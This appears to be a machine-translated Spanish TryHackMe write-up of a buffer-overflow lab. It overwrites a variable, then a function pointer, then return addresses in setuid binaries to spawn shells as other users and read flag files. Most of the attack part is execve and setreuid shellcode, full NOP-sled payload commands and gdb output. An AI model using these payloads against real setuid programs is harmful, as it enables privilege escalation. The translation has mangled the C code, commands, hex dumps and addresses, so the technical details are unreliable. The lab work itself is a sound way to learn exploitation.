[Tryhackme] ¡En realidad probé el desbordamiento del búfer! El buffer desborda la redacción

┌── (HackLab㉿hackLab)-[~] └─ $ ssh user1@10.10.165.6 No se puede establecer la autenticidad del host '10 .10.165.6 (10.10.165.6) '. ED25519 La huella digital clave es SHA256: ASF56RWYWWHAW06LWZFQZSBY9+GUN1JRYMQRK3FP5DU. Esta clave no se sabe por otros nombres, ¿está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.165.6 '(ED25519) a la lista de hosts conocidos. User1@10.10.165.6 Password: Último inicio de sesión: miércoles 27 de noviembre 21:42:30 2019 desde 82.34.52.37 __ | __ | _) _ | (/Amazon Linux 2 ami ___ | \ ___ | https://aws.amazon.com/amazon-linux-2/ [user1@ip-10-10-165-6 ~] $ 

[user1@IP-10-10-165-6 Overflow-1] $ Cat Int-Overflow.C #include<stdlib.h> #incluir<unistd.h> #incluir<stdio.h> int main (int argc, char ** argv) {volátil int variable = 0; Char Buffer [14]; obtiene (búfer); if (variable! = 0) {printf ("ha cambiado el valor de la variable \ n"); } else {printf ("intente de nuevo? \ n"); }}

[user1@IP-10-10-165-6 Overflow-1] $ GCC Int-Overflow.C [user1@IP-10-10-165-6 Overflow-1] $ ./a.out 01234567890123 ¿Intenta volver a?

[user1@IP-10-10-165-6 Overflow-1] $ ./a.out 012345678901234 Ha cambiado el valor de la variable

[user1@IP-10-10-22-183 Overflow-2] $ Cat Func-Pointer.C #include<stdlib.h> #incluir<unistd.h> #incluir<stdio.h> void especial () {printf ("Esta es la función especial \ n"); printf ("¡Hiciste esto, amigo! \ n"); } void normal () {printf ("Esta es la función normal \ n"); } void otros () {printf ("¿Por qué está esto aquí?"); } int main (int argc, char ** argv) {volatile int (*new_ptr) () = normal; Char Buffer [14]; obtiene (búfer); new_ptr (); }

[user1@IP-10-10-22-183 Overflow-2] $ GDB Func-Pointer GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (c) 2017 Free Software Foundation, Inc. Licencia GPLV3+: GNU GPL versión 3 o más tarde<http://gnu.org/licenses/gpl.html> Este es un software gratuito: puede cambiarlo y redistribuirlo. No hay garantía, en la medida permitida por la ley. Escriba "Mostrar copia" y "Mostrar advertencia" para más detalles. Este GDB se configuró como "X86_64-Redhat-Linux-Gnu". Escriba "Mostrar configuración" para los detalles de configuración. Para las instrucciones de informes de errores, consulte:<http://www.gnu.org/software/gdb/bugs/> . Encuentre el manual de GDB y otros recursos de documentación en línea en:<http://www.gnu.org/software/gdb/documentation/> . Para obtener ayuda, escriba "Ayuda". Escriba "Apropos Word" para buscar comandos relacionados con "Word" ... Lectura de símbolos de FUNC-Pointer ... (No se encontraron símbolos de depuración) ... Hecho. (GDB) Establecer columnas exec -wrapper env -u -u -u -u

(GDB) Ejecutar el programa inicial:/home/user1/overflow-2/func-pointer falting separado por separado, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64 1234567890123 Esta es la función normal [Inferior 1 (proceso 3567) exitada normalmente]

(GDB) Ejecutar el programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-2/func-pointer 123456789012345 Programa recibido Sign SigseGV, falla de segmentación. 0x0000000400035 in ?? ()

(GDB) Ejecutar el programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-2/func-pointer 12345678901234555555 Programa recibido SigseGVv, falla de segmentación. 0x0000353535 in ?? ()

(GDB) Ejecutar el programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-2/func-pointer 123456789012345555555 Programa recibido SigseGVv, falla de segmentación. 0x00000004005DA en Main ()

(GDB) Desmongar el volcado especial del código de ensamblador para la función especial: 0x0000000400567 <+0>: Push %RBP 0x0000000400568 <+1>: Mov %RSP, %RBP 0x0000000040056B <+4>: Mov $ 0x400680, %EDI 0x000000000000400570 <+9>><puts@plt> 0x000000000400575 <+14>: MOV $ 0x40069d,%EDI 0x000000000040057A <+19>: Callq 0x400460<puts@plt> 0x0000000040057F <+24>: NOP 0x00000000400580 <+25>: POP %RBP 0x0000000400581 <+26>: RETQ End del volcado del ensamblador.

\ x67 \ x05 \ x40 \ x00 \ x00 \ x00 \ x00

g^e@

(GDB) Ejecutar el programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-2/func-pointer 12345678901234g^e@ esta es la función especial que hiciste esto, amigo! [Inferior 1 (proceso 5144) salió normalmente]

[user1@ IP-10-10-22-183 Overflow-2] $ ./funcpointer 12345678901234g^e@ Esta es la función especial que hiciste esto, ¡amigo!

[user1@IP-10-10-22-183 Overflow-3] $ CAT buffer-overflow.c #include<stdio.h> #incluir<stdlib.h> void copy_arg (char *string) {char buffer [140]; strcpy (búfer, cadena); printf ("%s \ n", búfer); regresar 0; } int main (int argc, char ** argv) {printf ("Aquí hay un programa que hace eco de su entrada \ n"); copy_arg (argv [1]); }

[user1@IP-10-10-22-183 Overflow-3] $ GDB Buffer-Overflow GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (c) 2017 Free Software Foundation, Inc. Licencia GPLV3+: GNU GPL Versión 3 o más tarde<http://gnu.org/licenses/gpl.html> Este es un software gratuito: puede cambiarlo y redistribuirlo. No hay garantía, en la medida permitida por la ley. Escriba "Mostrar copia" y "Mostrar advertencia" para más detalles. Este GDB se configuró como "X86_64-Redhat-Linux-Gnu". Escriba "Mostrar configuración" para los detalles de configuración. Para las instrucciones de informes de errores, consulte:<http://www.gnu.org/software/gdb/bugs/> . Encuentre el manual de GDB y otros recursos de documentación en línea en:<http://www.gnu.org/software/gdb/documentation/> . Para obtener ayuda, escriba "Ayuda". Escriba "Apropos Word" para buscar comandos relacionados con "Word" ... Lectura de símbolos de Buffer-Overflow ... (No se encontraron símbolos de depuración) ... Hecho.

(GDB) Ejecutar $ (Python -C "imprime ('a'*148)") Programa inicial:/home/user1/overflow-3/buffer-overflow $ (python -c "print ('a'*148)") faltando debuginfos separados, use: debuginfo-install glibc-25.26-32.amzn2.0.1.x86_64 aquí es un programa de Debuginfo-Install. Solía su programa AAAAA AAAAA recibió señal SigseGV, falla de segmentación. 0x00000000400595 en Main ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*153)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-3/buffer-overflow $ (python -c "imprime ('a'*153)") Aquí hay un programa que hace eco de su programa AAAAA de entrada recibió señal SigseGV, falla de segmentación. 0x00000000400041 en ?? ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*158)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-3/buffer-overflow $ (python -c "imprime ('a'*158)") Aquí hay un programa que hace eco de su programa AAAAA de entrada recibió señal SigseGV, falla de segmentación. 0x00004141414141 en ?? ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*159)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-3/buffer-overflow $ (python -c "print ('a'*159)") Aquí hay un programa que hace eco de su programa AAAAA de entrada recibió señal SigseGV, falla de segmentación. 0x00000000400563 en copy_arg ()

Push $ 0x3B POP %EAX XOR %RDX, %RDX Movabs $ 0x68732f6e69622f2f, %r8 shR $ 0x8, %r8 push %r8 mov %rsp, %rdi push %rdx push %rdi mov %rsp, %rsi syscall <---------------------------------------------------------------------------------------------------------------

\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05

(GDB) Ejecutar $ (Python -C "Impresión 'A'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '*12+' b '*6 ")) El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-3/buffer-overflow $ (Python -C "Impresión '\ x90'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x 41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '*12+' b '*6 ") Aquí hay un programa que hace eco de su entrada ``J; xh1i // bin/shiaphrwhj

(GDB) x/100x $ rsp-200 0x7ffffffffe228: 0x00400450 0x0000000000 0xffffe3e0 0x000007ffff 0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fffffffffffefffe248: 0x00000000000000xf7dce8c0 0x00007fffffffffffefffffe: 0xffe6 0x00007ffff 0x414141 0x414141 0x7fffffffffe258: 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x414141 0x7fffffffe268: 0x414141 0x414141 0x414141 0x414141 0x414141 0x7fffffffe278: 0x414141 0x414141 0x414141 0x414141 0x7ffffffe288: 0x414141 0x414141 0x414141 0x414141 0x414141 0x7fffffffe2a8: 0x414141 0x4141411 0x41414141 0x48583b6a 0x7fffffffe2b8: 0xb844444141 0x622222222222222222222 0x68732f6e 0x08e8c149 0x7fffffffffe2c8: 0x89485041 0x485752e7 0x050fe689 0x48583c6a 0x7fffffffffe2d8: 0x050ffff31 0x414141 0x414141 0x414141 0x414141 0x414141 0x7ffffffffe2e8: 0x424242 0x00004242 0xfffffe3e8 0x00007ffff 0x7fffffffe2f8: 0x0000000 0x000000002 0x004005a0 0x0000000 0x7fffffe308: 0xf77a4302 0x00007ffff 0x0000000 0x000000 0x7fffffffe318: 0xffffe3e8 0x00007ffff 0x00000040000 0x0000002 0x7ffffffffe328: 0x00400564 0x000000 0x00000000 0x000000 0x7fffffe338: 0x654af5 0xcc0a789a 0x00400450 0x0000000 0x7fffffffe348: 0xffffe3e0 0x0000000 0x000000 0x7fffffffe358: 0x00000000 0x00000000 0x7fffffffffe358: 0x000000 0x000000 0xa82a4ef5 0x333f587e 0x7fffffffe368: 0x31ce4ef5 0x33f59752 0x000000 0x00000000 0x7fffffffe378: 0x00000000 0x000000 0x0000000 0x7fffffffffe388: 0xfffffe400 0x007ffff 0xf7fffe130 0x007fffffffff. 0xf7de7656 0x00007ffff 0x0000000 0x0000000 0x7fffffffffe3a8: 0x000000 0x0000000 0x0000000

(GDB) Ejecutar $ (Python -C "Impresión '\ x90'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '*12+' b '*6 ") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-3/buffer-overflow $ (Python -C "Impresión '\ x90'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x 41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '*12+' b '*6 ") Aquí hay un programa que hace eco de su entrada ``J; xh1i // bin/shiaphrwhj

(GDB) x/100x $ RSP-200 0x7fffffffe228: 0x00400450 0x0000000000 0xffffe3e0 0x000007ffff 0x7fffffffe238: 0x00400561 0x0000000000xf7dce8c0 0x00007fffffffffffffeffe248: 0x00000000000000xf7dce8c0 0x00007fffffffffffffffe 0x00007ffff 0x90909090 0x909090 0x7fffffffffe258: 0x909090 0x909090 0x909090 0x7fffffffffe268: 0x909090 0x909090 0x7fffffffffe268: 0x90909090 0x909090 0x909090 0x909090 0x7fffffffffe278: 0x909090 0x909090 0x909090 0x909090 0x7fffffffffe288: 0x909090 0x909090 0x909090 0x7fffffe288: 0x909090 0x909090 0x909090 0xfffffffffe288: 0x909090 0x909090 0x909090 0x9090909090 0x48583b6a 0x7fffffffefffefffffffffffffffffffef8: 0xb849d231 0x696222f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f22f2f2f22 0x68732f6e 0x08e8c149 0x7fffffffffe2c8: 0x89485041 0x485752e7 0x050fe689 0x48583c6a 0x7fffffffffe2d8: 0x050ffff31 0x414141 0x414141 0x414141 0x414141 0x7fffffffffe2e8: 0x424242 0x00004242 0xfffffe3e8 0x00007ffff 0x7fffffffe2f8: 0x0000000 0x000000002 0x004005a0 0x000000000 0x7ffffffe308: 0xf7a4302a 0x000000007ffff 0x000000 0x7fffffffe318: 0xffffe3e8 0x00007ffff 0x000040000 0x0000002 0x7fffffffe328: 0x00400564 0x000000 0x000000 0x000000 0x7fffffffe338: 0x02ce8e0b 0x844e9507 0x00400450 0x0000000 0x7fffffffe348: 0xffffe3e0 0x0000000 0x00000000 0x7fffffffe358: 0x0000000 0x000000 0xcfae8e0b 0x7bb16a78 0x7fffffe368: 0x564a8e0b 0x7bb17acf 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 MENTA 0x7fffffffe378: 0x000000 0x0000000 0x000000 0x0000000 0x7ffffffffffe388: 0xfffffe400 0x00007ffff 0xf7fffe130 0x00007ffff 0x7fffffffe398: 0xf7de7656 0x00007ffff 0x0000000 0x00000000000 0x7fffffffffe3a8: 0x000000 0x0000000 0x0000000

(GDB) Ejecutar $ (Python -C "Impresión '\ x90'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xD2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x50 \ x50 48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '*12+' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '") Programa inicial:/home/user1/overflow-3/buffer-uperflow $ (imprime de python -c " '\ x90'*100+'\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '*12+' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '") Aquí hay un programa que hace eco de su entrada ``J; xh1i // bin/shiaphrwhj 

SH-4.2 $ WHOAMI separando después de la bifurcación del proceso infantil 5377. Usuario1

SH-4.2 $ LS -L DESPARACIÓN DESPUÉS DEL PROCESO NIÑO 5380. TOTAL 20 -RWSRWXR-X 1 USER2 USER2 8264 SEP 2 2019 Buffer-Overflow -RW-RW-R-- 1 User1 User1 285 Sep 2 2019 Buffer-Overflow.C.C -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

[user1@IP-10-10-22-183 Overflow-3] $ cat/etc/passwd raíz: x: 0: 0: root:/root:/bin/bash bin: x: 1: 1: bin:/bin:/sbin/nologin demoemon: x: 2: 2: daemon:/sbin:/sbin/nodologin ADM: X: 3: 4: adm:/var/adm:/sbin/nologin lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin sincron halt: x: 7: 0: halt:/sbin:/sbin/halt mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin operator: x: 11: 0: operador:/root:/sbin/nologin juegos: x: 12: 100: juegos:/usr/juegos:/sbin/nodology ftp: x: 14: 50: 50: 50: 50: 50 Usuario:/var/ftp:/sbin/nologin nadie: x: 99: 99: nadie:/:/sbin/nologin systemd-network: x: 192: 192: systemd gestión de red:/:/sbin/nologin dbus: x: 81: 81: sistema de mensajes del sistema:/:/sbin/rpc: x: 32: 32: 32: rpbbbbbbbbbbbbbbbbbbbbbbbBebB Demonio:/var/lib/rpcbind:/sbin/nologin libstoragemgmt: x: 999: 997: cuentas de demonio para libstoragemgmt:/var/run/lsm:/sbin/nologin sshd: x: 74: 74: ssh:/var/vacía/sshd:/sshd:/sbin/sbin RPCuser: X: 29: 29: RPC Servicio Usuario:/var/lib/nfs:/sbin/nologin nfsnobody: x: 65534: 65534: user de NFS anónimo:/var/lib/nfs:/sbin/nologin EC2-Instance-Connect: X: 998: 996 ::/Home/EC2-Instance-Connect:/Sbin/Nologin Postfix: X: 89: 89 ::/var/spool/postfix:/sbin/nologin Chrony: x: 997: 995 ::/var/lib/crony:/sbin/nologin tcpdump: x: 72: 72 ::/sbin/nologin EC2-User: x: 1000: 1000: EC2 Usuario predeterminado:/Home/EC2-User:/bin/Bash User1: X: 1001: 1001 ::/Home/User1:/Bin/Bash User2: X: 1002: 1002 ::/Home/User2:/Bin/Bash User3: x: 1003: 1003 ::/home/user3:/bin/bash

┌── (Hacklab㉿hackLab) -[~] └─ $ PWN Shellcraft -fd amd64.linux.setreuid 1002 \ x31 \ xff \ x66 \ xbf \ xea \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x05

[user1@IP-10-10-22-183 Overflow-3] $ ./Buffer-Overflow $ (Python -C "Impresión '\ x90'*86+'\ x31 \ xff \ x66 \ xbf \ xea \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x0 5 \ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6 a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '*12+' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '") Aquí hay un programa que hace eco de su entrada ``1fjqxhj; xh1i // bin/shiaphrwhj

SH-4.2 $ CAT SECRET.TXT OMGYUDIDTHISSOCOOL !!

[user1@IP-10-10-232-238 Overflow-4] $ CAT Buffer-Overflow-2.c #include<stdio.h> #incluir<stdlib.h> void concat_arg (char *string) {char buffer [154] = "doggo"; strcat (búfer, cadena); printf ("La nueva palabra es %s \ n", buffer); regresar 0; } int main (int argc, char ** argv) {concat_arg (argv [1]); }

[user1@IP-10-10-232-238 Overflow-4] $ GDB Buffer-Overflow-2 GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (c) 2017 Free Software Foundation, Inc. Licencia GPLV3+: Versión de GNU GPL 3 o más tarde<http://gnu.org/licenses/gpl.html> Este es un software gratuito: puede cambiarlo y redistribuirlo. No hay garantía, en la medida permitida por la ley. Escriba "Mostrar copia" y "Mostrar advertencia" para más detalles. Este GDB se configuró como "X86_64-Redhat-Linux-Gnu". Escriba "Mostrar configuración" para los detalles de configuración. Para las instrucciones de informes de errores, consulte:<http://www.gnu.org/software/gdb/bugs/> . Encuentre el manual de GDB y otros recursos de documentación en línea en:<http://www.gnu.org/software/gdb/documentation/> . Para obtener ayuda, escriba "Ayuda". Escriba "Apropos Word" para buscar comandos relacionados con "Word" ... Lectura de símbolos de Buffer-Overflow-2 ... (No se encontraron símbolos de depuración) ... Hecho. (GDB) 

(GDB) Ejecutar $ (Python -C "PRINT ('A'*162)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-4/buffer-overflow-2 $ (python -c "imprime ('a'*157)") La nueva palabra es doggoaaaaaaaa programa recibido señal sigsegv, falla de segmentación. 0x000000004005D3 en Main ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*164)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-4/buffer-overflow-2 $ (python -c "imprime ('a'*164)") La nueva palabra es doggoaaaaaaaa un programa recibido señal sigsegv, falla de segmentación. 0x00000000400041 en ?? ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*169)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-4/buffer-overflow-2 $ (python -c "print ('a'*169)") La nueva palabra es doggoaaaaaaaa programa recibido señal sigsegv, falla de segmentación. 0x00004141414141 en ?? ()

(GDB) Ejecutar $ (Python -C "Impresión ('A'*170)") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-4/buffer-overflow-2 $ (python -c "imprime ('a'*170)") La nueva palabra es doggoaaaaaaaa un programa recibido señal sigsegv, falla de segmentación. 0x000000004005AB en concat_arg ()

\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05

[user1@IP-10-10-232-238 Overflow-4] $ cat/etc/passwd root: x: 0: 0: root:/root:/bin/bash bin: x: 1: 1: bin:/bin:/sbin/nologin demoemon: x: 2: 2: daemon:/sbin:/sbin/nologin ADM: X: 3: 4: adm:/var/adm:/sbin/nologin lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin sincron halt: x: 7: 0: halt:/sbin:/sbin/halt mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin operator: x: 11: 0: operador:/root:/sbin/nologin juegos: x: 12: 100: juegos:/usr/juegos:/sbin/nodology ftp: x: 14: 50: 50: 50: 50: 50 Usuario:/var/ftp:/sbin/nologin nadie: x: 99: 99: nadie:/:/sbin/nologin systemd-network: x: 192: 192: systemd gestión de red:/:/sbin/nologin dbus: x: 81: 81: sistema de mensajes del sistema:/:/sbin/rpc: x: 32: 32: 32: rpbbbbbbbbbbbbbbbbbbbbbbbBebB Demonio:/var/lib/rpcbind:/sbin/nologin libstoragemgmt: x: 999: 997: cuentas de demonio para libstoragemgmt:/var/run/lsm:/sbin/nologin sshd: x: 74: 74: ssh:/var/vacía/sshd:/sshd:/sbin/sbin RPCuser: X: 29: 29: RPC Servicio Usuario:/var/lib/nfs:/sbin/nologin nfsnobody: x: 65534: 65534: user de NFS anónimo:/var/lib/nfs:/sbin/nologin EC2-Instance-Connect: X: 998: 996 ::/Home/EC2-Instance-Connect:/Sbin/Nologin Postfix: X: 89: 89 ::/var/spool/postfix:/sbin/nologin Chrony: x: 997: 995 ::/var/lib/crony:/sbin/nologin tcpdump: x: 72: 72 ::/sbin/nologin EC2-User: x: 1000: 1000: EC2 Usuario predeterminado:/Home/EC2-User:/bin/Bash User1: X: 1001: 1001 ::/Home/User1:/Bin/Bash User2: X: 1002: 1002 ::/Home/User2:/Bin/Bash User3: x: 1003: 1003 ::/home/user3:/bin/bash

┌── (Hacklab㉿hackLab) -[~] └─ $ pwn shellcraft -fd amd64.linux.setreuid 1003 \ x31 \ xff \ x66 \ xbf \ xeb \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x05

\ x31 \ xff \ x66 \ xbf \ xeb \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x05 \ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05

(GDB) Ejecutar $ (Python -C "Impresión '\x90'*87+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e \x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x31\xff\x0f\x05'+'A'*22+'B'*6") El programa que se está depurando ya se ha iniciado. Comenzar desde el principio? (y o n) y programa inicial:/home/user1/overflow-4/buffer-overflow-2 $ (python -c "impresión '\x90'*87+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e \x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x31\xff\x0f\x05'+'A'*22+'B'*6") La nueva palabra es doggo1fjqxhj; xh1i // bin/shiaphrwhj

(gdb) x/100x $rsp-200 0x7fffffffe218: 0x004005a9 0x000000000 0xf7fffa268 0x00007ffff 0x7fffffffe228: 0xffffe63a 0x00007ffff 0x67676f64 0x9090906f 0x7fffffffffe238: 0x90909090 0x909090 0x909090 0x909090 0x7fffffffffe248: 0x90909090 0x909090 0x7fffffffffe248: 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x7fffffffe258: 0x909090 0x909090 0x909090 0x909090 0x909090 0x7fffffffffe268: 0x909090 0x909090 0x909090 0x7fffffffffe278: 0x909090 0x909090 0x909090 0x7ffffffffe278: 0x909090 0x909090 0x90909090 0x7ffffffffe288: 0x909090 0xbf66631 0x7166a03eB 0xfe894858 0x7ffffffffe298: 0x3b6a050f 0xd2314858 0x2f2fb849 0x2f6e6962 0x7fffffffe2a8: 0xc1496873 0x504108e8 0x52e78948 0xe6894857 0x7fffffffe2b8: 0x3c6a050f 0xff314858 0x4141050f 0x414141 0x7fffffffe2c8: 0x414141 0x414141 0x414141 0x414141 0x414141 0x7fffffffe2d8: 0x424242 0x00004242 0xfffffe3d8 0x00007ffff 0x7fffffffe2e8: 0x0000000 0x0000002 0x004005e0 0x0000000 0x7fffffffe2f8: 0xf7a4302a 0x0000007ffff 0x0000000 0x000000000000000000000000000000000088: 0xf7a4302a 0x00007ffff 0x0000000 0x0000000000000000000000000000000000888: 0xf7a4302a 0x00007ffff 0x0000000 0x00000000000000000000000000000000000088: 0XF7A4302A 0X00007FFFF 0X0000000 0x000000000000000000000000000000IFFFEFECHE308: 0xffEfE. 0x00007ffff 0x000040000 0x0000002 0x7fffffffffe318: 0x004005ac 0x000000 0x000000 0x000000 0x7fffffffe328: 0x04bbf356 0x29eb8017 0x00400450 0x0000000 0x7fffffe338: 0xfffffe 0x0000000 0x000000 0x7fffffffe348: 0x0000000 0x000000 0x7ffffffffffe348: 0x0000000 0x000000 0xc97bf356 0xd6147f68 0x7fffffffe358: 0x50bff356 0xd6146fdf 0x000000000000000000000000000000 0x7fffffffe368: 0x0000000 0x000000 0x0000000 0x0000000 0x7ffffffffffe378: 0xfffffe3f0 0x000007ffff 0xf7fffe130 0x00007ffff 0x7fffffffe388: 0xf7de7656 0x00007ffff 0x0000000 0x0000000000000000 0x7fffffffffe398: 0x000000 0x0000000 0x0000000

[user1@IP-10-10-232-238 Overflow-4] $ ./Buffer-Overflow-2 $ (Python -C "Impresión '\ x90'*87+'\ x31 \ xff \ x66 \ xbf \ xeb \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x0 5 \ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6 a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '*22+' \ x88 \ xe2 \ xff \ xff \ xff \ x7f '") La nueva palabra es doggo1fjqxhj; xh1i // bin/shiaphrwhj

SH-4.2 $ Cat Secret.txt wowanothertime !!